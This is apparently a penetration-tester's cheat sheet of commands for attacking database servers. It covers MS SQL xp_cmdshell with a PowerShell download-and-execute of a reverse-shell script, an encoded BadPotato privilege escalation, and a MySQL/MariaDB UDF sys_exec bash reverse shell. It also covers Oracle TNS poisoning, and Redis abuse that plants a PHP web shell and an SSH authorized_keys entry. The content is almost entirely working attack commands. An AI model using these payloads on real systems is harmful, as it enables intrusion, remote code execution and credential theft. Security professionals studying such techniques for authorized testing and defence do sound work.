DBMS

Database Management System
MS SQL
Enable xp_cmdshell
1> EXEC sp_configure 'show advanced options', 1
2> GO
1> RECONFIGURE
2> GO
1> EXEC sp_configure 'xp_cmdshell', 1
2> GO
1> RECONFIGURE
2> GO
1> xp_cmdshell whoami
2> GO
sqsh
$ sqsh -S 127.0.0.1 -U 'MEGACORP\snovvcrash' -P 'Passw0rd!'
1> xp_cmdshell "powershell -nop -exec bypass IEX(New-Object Net.WebClient).DownloadString('http://10.10.13.37/rev.ps1')"
2> GO
mssqlclient.py
$ mssqlclient.py MEGACORP/snovvcrash:'Passw0rd!'@127.0.0.1 [-windows-auth]
SQL> xp_cmdshell "powershell -nop -exec bypass IEX(New-Object Net.WebClient).DownloadString(\"http://10.10.13.37/rev.ps1\")"
mssql_shell.py
​https://github.com/Alamot/code-snippets/blob/master/mssql/mssql_shell.py​
Change MSSQL_SERVER, MSSQL_USERNAME and MSSQL_PASSWORD before running.
A scenario when abusing SeImpersonatePrivilege with PrintSpoofer (BadPotato):
$ python3 mssql_shell.py
CMD [email protected] C:\Windows\system32> UPLOAD pwn.exe \Windows\System32\spool\drivers\color\pwn.exe
CMD [email protected] C:\Windows\system32> UPLOAD Invoke-BadPotato.ps1 \Windows\System32\spool\drivers\color\potato.ps1
// . .\Invoke-BadPotato.ps1; Invoke-BadPotato -C "C:\Windows\System32\spool\drivers\color\pwn.exe"
CMD [email protected] C:\Windows\system32> powershell -enc LgAgAC4AXABJAG4AdgBvAGsAZQAtAEIAYQBkAFAAbwB0AGEAdABvAC4AcABzADEAOwAgAEkAbgB2AG8AawBlAC0AQgBhAGQAUABvAHQAYQB0AG8AIAAtAEMAIAAiAEMAOgBcAFcAaQBuAGQAbwB3AHMAXABTAHkAcwB0AGUAbQAzADIAXABzAHAAbwBvAGwAXABkAHIAaQB2AGUAcgBzAFwAYwBvAGwAbwByAFwAcAB3AG4ALgBlAHgAZQAiAAoA
mssql-cli
​https://github.com/dbcli/mssql-cli​
$ python -m pip install mssql-cli
$ mssql-cli -S 127.0.0.1 -U 'MEGACORP\snovvcrash' -P 'Passw0rd!'
MySQL/MariaDB
Basic CLI syntax:
$ mysql -h 127.0.0.1 -P 3306 -u snovvcrash -p'Passw0rd!' -e 'show databases;'
Basic enumeration:
mysql> show GRANTS;
mysql> select @@hostname, @@tmpdir, @@version, @@version_compile_machine, @@plugin_dir;
UDF PrivEsc
​https://www.exploit-db.com/exploits/1518​
​https://github.com/mysqludf/lib_mysqludf_sys​
​https://gist.github.com/snovvcrash/efeb79d3e2648ec5009dd2ea7052f8b9​
Install dependencies:
$ sudo apt install libmariadbclient-dev -y
$ git clone https://github.com/mysqludf/lib_mysqludf_sys && cd lib_mysqludf_sys
Compile .so library (x86 example):
$ sudo apt install libc6-dev-i386 -y
$ gcc lib_mysqludf_sys.c -o lib_mysqludf_sys_x86.so -m32 -Wl,--hash-style=both -fPIC -Wall -I/usr/include/mariadb/server -I/usr/include/mariadb/server/private -I. -shared -L/usr/lib/x86_64-linux-gnu/libstdc++.so.6
Compile .so library (x64 example):
$ gcc lib_mysqludf_sys.c -o lib_mysqludf_sys_x64.so -m64 -Wl,--hash-style=both -fPIC -Wall -I/usr/include/mariadb/server -I/usr/include/mariadb/server/private -I. -shared -L/usr/lib/x86_64-linux-gnu/libstdc++.so.6
Convert library to hex:
$ xxd -p lib_mysqludf_sys.so | tr -d '\n'
Load library and call user-defined sys_exec function with a rev-shell.
MySQL (x86 example):
mysql> use mysql;
mysql> create table pwn(line blob);
mysql> insert into pwn values(load_file('/tmp/lib_mysqludf_sys_x86.so'));
mysql> select * from pwn into dumpfile '/usr/lib/lib_mysqludf_sys_x86.so';
​
Or load it from hex:
mysql> set @pwn = '7F..00';
mysql> select unhex(@pwn) into dumpfile '/usr/lib/lib_mysqludf_sys_x86.so';
​
mysql> create function sys_exec returns integer soname 'lib_mysqludf_sys_x86.so';
mysql> select sys_exec("/bin/bash -c '/bin/bash -i >& /dev/tcp/127.0.0.1/1337 0>&1'");
MariaDB (x64 example):
MariaDB> show variables like '%plugin%';  # get lib path
MariaDB> use mysql;
MariaDB> create table pwn(line blob);
MariaDB> insert into pwn values(load_file('/tmp/lib_mysqludf_sys_x64.so'));
MariaDB> select * from pwn into dumpfile '/usr/lib/x86_64-linux-gnu/mariadb19/plugin/lib_mysqludf_sys_x64.so';
​
Or load it from hex:
MariaDB> set @pwn = 0x7F..00;
MariaDB> select binary @pwn into dumpfile '/usr/lib/x86_64-linux-gnu/mariadb19/plugin/lib_mysqludf_sys_x64.so';
​
MariaDB> create function sys_exec returns integer soname 'lib_mysqludf_sys_x64.so';
MariaDB> select sys_exec("/bin/bash -c '/bin/bash -i >& /dev/tcp/127.0.0.1/1337 0>&1'");
Oracle
​https://xakep.ru/2015/04/07/195-oracle-db/​
​https://www.blackhat.com/presentations/bh-usa-09/GATES/BHUSA09-Gates-OracleMetasploit-SLIDES.pdf​
​https://book.hacktricks.xyz/pentesting/1521-1522-1529-pentesting-oracle-listener​
​http://www.red-database-security.com/wp/oracle_cheat.pdf​
odat
​https://github.com/quentinhardy/odat/releases​
Install manually (depreciated):
​https://github.com/quentinhardy/odat#installation-optional-for-development-version​
$ git clone https://github.com/quentinhardy/odat ~/tools/odat && cd ~/tools/odat
$ git submodule init && git submodule update
$ sudo apt install libaio1 python3-dev alien python3-pip
$ wget https://download.oracle.com/otn_software/linux/instantclient/19600/oracle-instantclient19.6-basic-19.6.0.0.0-1.x86_64.rpm
$ wget https://download.oracle.com/otn_software/linux/instantclient/19600/oracle-instantclient19.6-devel-19.6.0.0.0-1.x86_64.rpm
$ sudo alien --to-deb *.rpm
$ sudo dpkg -i *.deb
$ vi /etc/profile
...
export ORACLE_HOME=/usr/lib/oracle/19.6/client64/
export LD_LIBRARY_PATH=$LD_LIBRARY_PATH:$ORACLE_HOME/lib
export PATH=${ORACLE_HOME}bin:$PATH
...
$ pip3 install cx_Oracle
$ python3 odat.py -h
TNS Poison
​http://www.joxeankoret.com/download/tnspoison.pdf​
​https://www.youtube.com/watch?v=0IKltOBXiII​
Check with Nmap:
$ sudo wget https://gist.githubusercontent.com/JukArkadiy/3d6cff222d1b87e963e7/raw/fbe6fe17a9bca6ce839544b7afb2276fff061d46/oracle-tns-poison.nse -O /usr/share/nmap/scripts/oracle-tns-poison.nse
$ sudo nmap -v -n -Pn -sV --script oracle-tns-poison.nse -oA CVE-2014-0160/nmap/tns-poison -p1521 10.10.13.37
Brute SID with MSF:
msf > use auxiliary/scanner/oracle/sid_brute
msf > set RHOSTS file:oracle.txt
msf > set THREADS 25
msf > set VERBOSE false
msf > run
Brute SID with odat:
$ odat sidguesser -s 10.10.13.37 -p 1521
Exploit with odat:
​https://github.com/quentinhardy/odat/wiki/tnspoison​
$ odat tnspoison -s 10.10.13.37 -d <SID> --test-module
$ odat tnspoison -s 10.10.13.37 -d <SID> --poison
SQLite
SELECT tbl_name FROM sqlite_master WHERE type='table' AND tbl_name NOT like 'sqlite_%';
SELECT sql FROM sqlite_master WHERE type!='meta' AND sql NOT NULL AND name NOT LIKE 'sqlite_%' AND name ='secret_database';
SELECT username,password FROM secret_database;
Redis
​https://packetstormsecurity.com/files/134200/Redis-Remote-Command-Execution.html​
​2018.zeronights.ru/wp-content/uploads/materials/15-redis-post-exploitation.pdf​
​https://github.com/holys/redis-cli/releases​
​https://github.com/antirez/redis​
Check for anonymous login:
$ nc 127.0.0.1 6379
Escape character is '^]'.
echo "Hey, no AUTH required!"
$21
Hey, no AUTH required!
quit
+OK
Connection closed by foreign host.
Sensitive injection points for testing:
/var/www/html
/home/redis/.ssh
/var/lib/redis/.ssh
/var/spool/cron/crontabs
/var/spool/cron
​
$ for dname in `cat dirs.txt`; do redis-cli -h 127.0.0.1 config set dir $dname | grep OK && echo $dname; done
Web Shell
​https://book.hacktricks.xyz/pentesting/6379-pentesting-redis​
$ redis-cli -h 127.0.0.1 flushall
$ redis-cli -h 127.0.0.1 set pwn '<?php system($_REQUEST['cmd']); ?>'
$ redis-cli -h 127.0.0.1 config set dbfilename shell.php
$ redis-cli -h 127.0.0.1 config set dir /var/www/html
$ redis-cli -h 127.0.0.1 save
SSH Public Key
​https://github.com/Avinash-acid/Redis-Server-Exploit​
$ ssh-keygen -t ecdsa -s 521 -f key
$ (echo -e "\n\n"; cat key.pub; echo -e "\n\n") > key.txt
$ redis-cli -h 127.0.0.1 flushall
$ cat foo.txt | redis-cli -h 127.0.0.1 -x set pwn
$ redis-cli -h 127.0.0.1 config set dbfilename authorized_keys
$ redis-cli -h 127.0.0.1 config set dir /var/lib/redis/.ssh
$ redis-cli -h 127.0.0.1 save
Firebird
​https://www.infosecmatter.com/firebird-database-exploitation/​
Tools
DBeaver
​DBeaver Community​
DbVisualizer
​DbVisualizer​
Zerologon
File Transfer
Last updated 15 hours ago